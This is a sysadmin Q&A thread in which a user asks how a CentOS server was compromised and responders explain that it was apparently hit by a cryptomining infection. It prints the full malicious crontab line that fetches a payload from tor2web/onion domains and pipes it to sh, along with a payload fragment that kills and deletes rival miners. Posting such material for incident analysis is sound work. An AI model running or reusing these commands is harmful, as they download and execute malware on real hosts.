1

I am working on a compromised server. CentOS 6.10 with [kthreadd] taking up most of the CPU.

Old crontab deleted, and the following content put in place:

*/4 * * * * R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ];then G1="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && G1="$f" && break;done;fi;G2="wget";if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ];then G2="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && G2="$f" && break;done;fi;if [ $(cat /etc/hosts|grep -i "onion.\|timesync.su\|tor2web"|wc -l) -ne 0 ];then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1;fi; C=" -fsSLk --connect-timeout 26 --max-time 75 ";W=" --quiet --tries=1 --no-check-certificate --connect-timeout=26 --timeout=75 ";H="https://an7kmd2wp4xo7hpr";T1=".tor2web.su/";T2=".d2web.org/";T3=".onion.sh/";P="src/ldm";($G1 $C $H$T1$P||$G1 $C $H$T2$P||$G1 $C $H$T3$P||$G2 $W $H$T1$P||$G2 $W $H$T2$P||$G2 $W $H$T3$P)|sh &

I have also found the following shell script in the file structure: pastebin

So based on all the stuff I found screwed up in the system I recon everyone will tell me to spawn a new server. And I most certainly will. But maybe there is someone out there who is willing to take an in-depth look of the script. I would really like to know how the system was compromised in the first place

parg0
  • 11
  • 1
  • 6
    The script likely isn't going to be any help in figuring out how it was compromised _in the first place_, you need to figure out how the script got there and / or how the crontab was updated originally. –  Oct 12 '19 at 20:32
  • check cron logs for changes, if server is shared. – asktyagi Oct 13 '19 at 07:27

2 Answers2

2

The script itself would not help in figuring out the attack vector. You might gain a general idea by identifying the script location and user it was ran as. If it was root, it won't help either.

So yeah, the important part here is that from now on your server will remain compromised no matter what you do.

I assume you have deleted the malicious cron job already? Chances are, there is some backdoor or leftover process that will respawn itself and/or recreate the cron.

If you are willing to let the server running, you can set up audit utility with file modification rules to see what processes change what. And go up the chain to find the legit compromised process.

esoroka
  • 307
  • 2
  • 5
0

How you got compromised in the first place is the correct question to get at root cause. But is not something that can be answered by looking at the script. The script is the payload. It was installed installed by some means, such as a credential in the hands of a bad actor, or an exploit chain.

Further, just knowing how this host was breached does not solve any other vulnerabilities in your environment.

Consider engaging a security consultant to do penetration testing or red team exercises. An external person may see the vulnerabilities better.

Obviously domain an7kmd2wp4xo7hpr.tor2web.su has a poor reputation as a malware site.

What is was doing seems at first glace relatively straightforward: crypto mining. 

    elif [ -f /proc/${p}/comm ]; then
        xmf="$(readlink /proc/${p}/cwd 2>/dev/null)/$(cat /proc/${p}/comm 2>/dev/null)"
        xm=$(grep -i "xmr\|cryptonight\|hashrate" ${xmf} 2>/dev/null)
    fi
    if [ -n "${xm}" ]; then ${sudo} kill -9 ${p} >/dev/null 2>&1; ${sudo} chattr -i -a "${xmf}" >/dev/null 2>&1; ${sudo} ${rm} -rf "${xmf}" >/dev/null 2>&1; fi

Killing competing miners and surviving reboot is more profit for the attackers. Not the first to do so, this has been a pattern seen on Linux boxes for months if not longer.

John Mahowald
  • 32,050
  • 2
  • 19
  • 34